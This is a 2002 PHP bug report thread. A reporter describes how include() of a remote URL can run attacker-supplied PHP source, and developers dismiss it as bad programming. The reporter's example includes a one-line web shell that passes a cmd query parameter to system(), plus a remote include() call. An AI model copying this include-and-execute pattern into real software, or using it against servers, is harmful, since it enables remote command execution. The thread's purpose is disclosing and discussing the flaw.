ID: 15187
User updated by: [EMAIL PROTECTED]
Reported By: [EMAIL PROTECTED]
Status: Bogus
Bug Type: Scripting Engine problem
Operating System: Linux 2.4
PHP Version: 4.1.1
New Comment:
It's true dat this is a 'user error', however there are scripts (e.g.
phpnuke has this problem) that allows a user to enter the URL that will
be included.
So, your right if a script is secure you wont deal with this bug.. but
I still see it as a security issue
Previous Comments:
------------------------------------------------------------------------
[2002-01-23 15:37:30] [EMAIL PROTECTED]
This is bad programming. If you want to avoid this, you should NOT use
include() for stuff on other servers, but fopen() or similar instead
(which doesn't parse the data).
BTW: the 'bug' in issue.php can be avoided by proper use of
register_globals, safe-mode and/or normal (unix) file permissions.
------------------------------------------------------------------------
[2002-01-23 15:36:30] [EMAIL PROTECTED]
RTFM!
Include is for including PHP scripts into your PHP script.
If you only want to include parsed output then do not use
include.
------------------------------------------------------------------------
[2002-01-23 15:36:28] [EMAIL PROTECTED]
I call it a user error. no external sources are to be trusted with no
error/security/integrity check.
------------------------------------------------------------------------
[2002-01-23 15:30:20] [EMAIL PROTECTED]
Hello,
I think there is a pretty large security issue in PHP. E.g. we have 2
servers, we call server 1 'embrace', and name server 2 'kossy'.
on embrace we create a file index.php:
<? include("http://kossy/issue.php";); ?>
on kossy we create a file issue.php:
<? system($cmd); ?>
well, if we now type: http://embrace/index.php?cmd=ls we see the 'ls'
output from kossy. This is the way it should be.. BUT, when we disable
PHP op kossy we get a rather nasty bug (imho).
If we type http://embrace/index.php?cmd=ls again (where kossy has no
PHP support) embrace includes the PHP source code from kossy and then
parses the file, which will give us the 'ls' result on embrace.
This can be used for numerous attacks. And I PHP should only include
parsed PHP or non-PHP files from external (http://) links.
Bye,
Tozz
------------------------------------------------------------------------
Edit this bug report at http://bugs.php.net/?id=15187&edit=1
--
PHP Development Mailing List <http://www.php.net/>
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
To contact the list administrators, e-mail: [EMAIL PROTECTED]
